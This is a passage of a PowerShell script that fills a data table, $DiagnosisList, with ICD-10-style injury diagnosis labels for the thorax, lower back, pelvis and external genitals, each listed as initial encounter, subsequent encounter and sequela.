injury of thoracic trachea","Unspecified injury of thoracic trachea, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of thoracic trachea","Unspecified injury of thoracic trachea, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of thoracic trachea","Unspecified injury of thoracic trachea, sequela") + $null = $DiagnosisList.Rows.Add("Primary blast injury of thoracic trachea","Primary blast injury of thoracic trachea, initial encounter") + $null = $DiagnosisList.Rows.Add("Primary blast injury of thoracic trachea","Primary blast injury of thoracic trachea, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Primary blast injury of thoracic trachea","Primary blast injury of thoracic trachea, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of thoracic trachea","Contusion of thoracic trachea, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of thoracic trachea","Contusion of thoracic trachea, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of thoracic trachea","Contusion of thoracic trachea, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of thoracic trachea","Laceration of thoracic trachea, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of thoracic trachea","Laceration of thoracic trachea, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of thoracic trachea","Laceration of thoracic trachea, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of thoracic trachea","Other injury of thoracic trachea, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of thoracic trachea","Other injury of thoracic trachea, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of thoracic trachea","Other injury of thoracic trachea, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of pleura","Unspecified injury of pleura, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of pleura","Unspecified injury of pleura, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of pleura","Unspecified injury of pleura, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of pleura","Laceration of pleura, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of pleura","Laceration of pleura, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of pleura","Laceration of pleura, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of pleura","Other injury of pleura, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of pleura","Other injury of pleura, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of pleura","Other injury of pleura, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of diaphragm","Contusion of diaphragm, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of diaphragm","Contusion of diaphragm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of diaphragm","Contusion of diaphragm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of diaphragm","Laceration of diaphragm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of diaphragm","Laceration of diaphragm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of diaphragm","Laceration of diaphragm, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of diaphragm","Other injury of diaphragm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of diaphragm","Other injury of diaphragm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of diaphragm","Other injury of diaphragm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of diaphragm","Unspecified injury of diaphragm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of diaphragm","Unspecified injury of diaphragm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of diaphragm","Unspecified injury of diaphragm, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of esophagus (thoracic part)","Contusion of esophagus (thoracic part), initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of esophagus (thoracic part)","Contusion of esophagus (thoracic part), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of esophagus (thoracic part)","Contusion of esophagus (thoracic part), sequela") + $null = $DiagnosisList.Rows.Add("Laceration of esophagus (thoracic part)","Laceration of esophagus (thoracic part), initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of esophagus (thoracic part)","Laceration of esophagus (thoracic part), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of esophagus (thoracic part)","Laceration of esophagus (thoracic part), sequela") + $null = $DiagnosisList.Rows.Add("Other injury of esophagus (thoracic part)","Other injury of esophagus (thoracic part), initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of esophagus (thoracic part)","Other injury of esophagus (thoracic part), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of esophagus (thoracic part)","Other injury of esophagus (thoracic part), sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of esophagus (thoracic part)","Unspecified injury of esophagus (thoracic part), initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of esophagus (thoracic part)","Unspecified injury of esophagus (thoracic part), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of esophagus (thoracic part)","Unspecified injury of esophagus (thoracic part), sequela") + $null = $DiagnosisList.Rows.Add("Contusion of other specified intrathoracic organs","Contusion of other specified intrathoracic organs, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of other specified intrathoracic organs","Contusion of other specified intrathoracic organs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of other specified intrathoracic organs","Contusion of other specified intrathoracic organs, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other specified intrathoracic organs","Laceration of other specified intrathoracic organs, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other specified intrathoracic organs","Laceration of other specified intrathoracic organs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other specified intrathoracic organs","Laceration of other specified intrathoracic organs, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of other specified intrathoracic organs","Other injury of other specified intrathoracic organs, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other specified intrathoracic organs","Other injury of other specified intrathoracic organs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other specified intrathoracic organs","Other injury of other specified intrathoracic organs, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other specified intrathoracic organs","Unspecified injury of other specified intrathoracic organs, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other specified intrathoracic organs","Unspecified injury of other specified intrathoracic organs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other specified intrathoracic organs","Unspecified injury of other specified intrathoracic organs, sequela") + $null = $DiagnosisList.Rows.Add("Injury of unspecified intrathoracic organ","Injury of unspecified intrathoracic organ, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified intrathoracic organ","Injury of unspecified intrathoracic organ, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified intrathoracic organ","Injury of unspecified intrathoracic organ, sequela") + $null = $DiagnosisList.Rows.Add("Crushed chest","Crushed chest, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushed chest","Crushed chest, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushed chest","Crushed chest, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic amputation (partial) of part of thorax, except breast","Traumatic amputation (partial) of part of thorax, except breast, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic amputation (partial) of part of thorax, except breast","Traumatic amputation (partial) of part of thorax, except breast, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic amputation (partial) of part of thorax, except breast","Traumatic amputation (partial) of part of thorax, except breast, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of right breast","Complete traumatic amputation of right breast, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of right breast","Complete traumatic amputation of right breast, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of right breast","Complete traumatic amputation of right breast, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of left breast","Complete traumatic amputation of left breast, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of left breast","Complete traumatic amputation of left breast, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of left breast","Complete traumatic amputation of left breast, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of unspecified breast","Complete traumatic amputation of unspecified breast, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of unspecified breast","Complete traumatic amputation of unspecified breast, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of unspecified breast","Complete traumatic amputation of unspecified breast, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of right breast","Partial traumatic amputation of right breast, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of right breast","Partial traumatic amputation of right breast, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of right breast","Partial traumatic amputation of right breast, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of left breast","Partial traumatic amputation of left breast, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of left breast","Partial traumatic amputation of left breast, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of left breast","Partial traumatic amputation of left breast, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of unspecified breast","Partial traumatic amputation of unspecified breast, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of unspecified breast","Partial traumatic amputation of unspecified breast, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of unspecified breast","Partial traumatic amputation of unspecified breast, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle and tendon of front wall of thorax","Unspecified injury of muscle and tendon of front wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle and tendon of front wall of thorax","Unspecified injury of muscle and tendon of front wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle and tendon of front wall of thorax","Unspecified injury of muscle and tendon of front wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle and tendon of back wall of thorax","Unspecified injury of muscle and tendon of back wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle and tendon of back wall of thorax","Unspecified injury of muscle and tendon of back wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle and tendon of back wall of thorax","Unspecified injury of muscle and tendon of back wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle and tendon of unspecified wall of thorax","Unspecified injury of muscle and tendon of unspecified wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle and tendon of unspecified wall of thorax","Unspecified injury of muscle and tendon of unspecified wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle and tendon of unspecified wall of thorax","Unspecified injury of muscle and tendon of unspecified wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Strain of muscle and tendon of front wall of thorax","Strain of muscle and tendon of front wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle and tendon of front wall of thorax","Strain of muscle and tendon of front wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle and tendon of front wall of thorax","Strain of muscle and tendon of front wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Strain of muscle and tendon of back wall of thorax","Strain of muscle and tendon of back wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle and tendon of back wall of thorax","Strain of muscle and tendon of back wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle and tendon of back wall of thorax","Strain of muscle and tendon of back wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Strain of muscle and tendon of unspecified wall of thorax","Strain of muscle and tendon of unspecified wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle and tendon of unspecified wall of thorax","Strain of muscle and tendon of unspecified wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle and tendon of unspecified wall of thorax","Strain of muscle and tendon of unspecified wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of muscle and tendon of front wall of thorax","Laceration of muscle and tendon of front wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle and tendon of front wall of thorax","Laceration of muscle and tendon of front wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle and tendon of front wall of thorax","Laceration of muscle and tendon of front wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of muscle and tendon of back wall of thorax","Laceration of muscle and tendon of back wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle and tendon of back wall of thorax","Laceration of muscle and tendon of back wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle and tendon of back wall of thorax","Laceration of muscle and tendon of back wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of muscle and tendon of unspecified wall of thorax","Laceration of muscle and tendon of unspecified wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle and tendon of unspecified wall of thorax","Laceration of muscle and tendon of unspecified wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle and tendon of unspecified wall of thorax","Laceration of muscle and tendon of unspecified wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of muscle and tendon of front wall of thorax","Other injury of muscle and tendon of front wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle and tendon of front wall of thorax","Other injury of muscle and tendon of front wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle and tendon of front wall of thorax","Other injury of muscle and tendon of front wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of muscle and tendon of back wall of thorax","Other injury of muscle and tendon of back wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle and tendon of back wall of thorax","Other injury of muscle and tendon of back wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle and tendon of back wall of thorax","Other injury of muscle and tendon of back wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of muscle and tendon of unspecified wall of thorax","Other injury of muscle and tendon of unspecified wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle and tendon of unspecified wall of thorax","Other injury of muscle and tendon of unspecified wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle and tendon of unspecified wall of thorax","Other injury of muscle and tendon of unspecified wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injuries of thorax","Other specified injuries of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of thorax","Other specified injuries of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of thorax","Other specified injuries of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of thorax","Unspecified injury of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of thorax","Unspecified injury of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of thorax","Unspecified injury of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of lower back and pelvis","Contusion of lower back and pelvis, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of lower back and pelvis","Contusion of lower back and pelvis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of lower back and pelvis","Contusion of lower back and pelvis, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of abdominal wall","Contusion of abdominal wall, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of abdominal wall","Contusion of abdominal wall, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of abdominal wall","Contusion of abdominal wall, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified external genital organ, male","Contusion of unspecified external genital organ, male, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified external genital organ, male","Contusion of unspecified external genital organ, male, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified external genital organ, male","Contusion of unspecified external genital organ, male, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified external genital organ, female","Contusion of unspecified external genital organ, female, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified external genital organ, female","Contusion of unspecified external genital organ, female, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified external genital organ, female","Contusion of unspecified external genital organ, female, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of penis","Contusion of penis, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of penis","Contusion of penis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of penis","Contusion of penis, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of scrotum and testes","Contusion of scrotum and testes, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of scrotum and testes","Contusion of scrotum and testes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of scrotum and testes","Contusion of scrotum and testes, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of vagina and vulva","Contusion of vagina and vulva, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of vagina and vulva","Contusion of vagina and vulva, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of vagina and vulva","Contusion of vagina and vulva, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of anus","Contusion of anus, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of anus","Contusion of anus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of anus","Contusion of anus, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of lower back and pelvis","Abrasion of lower back and pelvis, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of lower back and pelvis","Abrasion of lower back and pelvis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of lower back and pelvis","Abrasion of lower back and pelvis, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of abdominal wall","Abrasion of abdominal wall, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of abdominal wall","Abrasion of abdominal wall, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of abdominal wall","Abrasion of abdominal wall, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of penis","Abrasion of penis, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of penis","Abrasion of penis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of penis","Abrasion of penis, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of scrotum and testes","Abrasion of scrotum and testes, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of scrotum and testes","Abrasion of scrotum and testes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of scrotum and testes","Abrasion of scrotum and testes, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of vagina and vulva","Abrasion of vagina and vulva, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of vagina and vulva","Abrasion of vagina and vulva, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of vagina and vulva","Abrasion of vagina and vulva, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of unspecified external genital organs, male","Abrasion of unspecified external genital organs, male, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of unspecified external genital organs, male","Abrasion of unspecified external genital organs, male, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of unspecified external genital organs, male","Abrasion of unspecified external genital organs, male, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of unspecified external genital organs, female","Abrasion of unspecified external genital organs, female, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of unspecified external genital organs, female","Abrasion of unspecified external genital organs, female, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of unspecified external genital organs, female","Abrasion of unspecified external genital organs, female, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of anus","Abrasion of anus, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of anus","Abrasion of anus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of anus","Abrasion of anus, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of lower back and pelvis","Blister (nonthermal) of lower back and pelvis, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of lower back and pelvis","Blister (nonthermal) of lower back and pelvis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of lower back and pelvis","Blister (nonthermal) of lower back and pelvis, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of abdominal wall","Blister (nonthermal) of abdominal wall, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of abdominal wall","Blister (nonthermal) of abdominal wall, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of abdominal wall","Blister (nonthermal) of abdominal wall, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of penis","Blister (nonthermal) of penis, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of penis","Blister (nonthermal) of penis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of penis","Blister (nonthermal) of penis, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of scrotum and testes","Blister (nonthermal) of scrotum and testes, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of scrotum and testes","Blister (nonthermal) of scrotum and testes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of scrotum and testes","Blister (nonthermal) of scrotum and testes, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of vagina and vulva","Blister (nonthermal) of vagina and vulva, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of vagina and vulva","Blister (nonthermal) of vagina and vulva, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of vagina and vulva","Blister (nonthermal) of vagina and vulva, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of unspecified external genital organs, male","Blister (nonthermal) of unspecified external genital organs, male, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of unspecified external genital organs, male","Blister (nonthermal) of unspecified external genital organs, male, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of unspecified external genital organs, male","Blister (nonthermal) of unspecified external genital organs, male, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of unspecified external genital organs, female","Blister (nonthermal) of unspecified external genital organs, female, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of unspecified external genital organs, female","Blister (nonthermal) of unspecified external genital organs, female, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of unspecified external genital organs, female","Blister (nonthermal) of unspecified external genital organs, female, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of anus","Blister (nonthermal) of anus, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of anus","Blister (nonthermal) of anus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of anus","Blister (nonthermal) of anus, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of lower back and pelvis","External constriction of lower back and pelvis, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of lower back and pelvis","External constriction of lower back and pelvis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of lower back and pelvis","External constriction of lower back and pelvis, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of abdominal wall","External constriction of abdominal wall, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of abdominal wall","External constriction of abdominal wall, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of abdominal wall","External constriction of abdominal wall, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of penis","External constriction of penis, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of penis","External constriction of penis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of penis","External constriction of penis, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of scrotum and testes","External constriction of scrotum and testes, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of scrotum and testes","External constriction of scrotum and testes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of scrotum and testes","External constriction of scrotum and testes, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of vagina and vulva","External constriction of vagina and vulva, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of vagina and vulva","External constriction of vagina and vulva, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of vagina and vulva","External constriction of vagina and vulva, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of unspecified external genital organs, male","External constriction of unspecified external genital organs, male, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of unspecified external genital organs, male","External constriction of unspecified external genital organs, male, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of unspecified external genital organs, male","External constriction of unspecified external genital organs, male, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of unspecified external genital organs, female","External constriction of unspecified external genital organs, female, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of unspecified external genital organs, female","External constriction of unspecified external genital organs, female, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of unspecified external genital organs, female","External constriction of unspecified external genital organs, female, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of lower back and pelvis","Superficial foreign body of lower back and pelvis, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of lower back and pelvis","Superficial foreign body of lower back and pelvis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of lower back and pelvis","Superficial foreign body of lower back and pelvis, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of abdominal wall","Superficial foreign body of abdominal wall, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of abdominal wall","Superficial foreign body of abdominal wall, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of abdominal wall","Superficial foreign body of abdominal wall, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of penis","Superficial foreign body of penis, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of penis","Superficial foreign body of penis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of penis","Superficial foreign body of penis, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of scrotum and testes","Superficial foreign body of scrotum and testes, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of scrotum and testes","Superficial foreign body of scrotum and testes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of scrotum and testes","Superficial foreign body of scrotum and testes, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of vagina and vulva","Superficial foreign body of vagina and vulva, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of vagina and vulva","Superficial foreign body of vagina and vulva, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of vagina and vulva","Superficial foreign body of vagina and vulva, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of unspecified external genital organs, male","Superficial foreign body of unspecified external genital organs, male, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of unspecified external genital organs, male","Superficial foreign body of unspecified external genital organs, male, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of unspecified external genital organs, male","Superficial foreign body of unspecified external genital organs, male, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of unspecified external genital organs, female","Superficial foreign body of unspecified external genital organs, female, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of unspecified external genital organs, female","Superficial foreign body of unspecified external genital organs, female, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of unspecified external genital organs, female","Superficial foreign body of unspecified external genital organs, female, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of anus","Superficial foreign body of anus, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of anus","Superficial foreign body of anus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of anus","Superficial foreign body of anus, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of lower back and pelvis","Insect bite (nonvenomous) of lower back and pelvis, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of lower back and pelvis","Insect bite (nonvenomous) of lower back and pelvis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of lower back and pelvis","Insect bite (nonvenomous) of lower back and pelvis, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of abdominal wall","Insect bite (nonvenomous) of abdominal wall, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of abdominal wall","Insect bite (nonvenomous) of abdominal wall, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of abdominal wall","Insect bite (nonvenomous) of abdominal wall, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of penis","Insect bite (nonvenomous) of penis, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of penis","Insect bite (nonvenomous) of penis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of penis","Insect bite (nonvenomous) of penis, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of scrotum and testes","Insect bite (nonvenomous) of scrotum and testes, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of scrotum and testes","Insect bite (nonvenomous) of scrotum and testes, subsequent 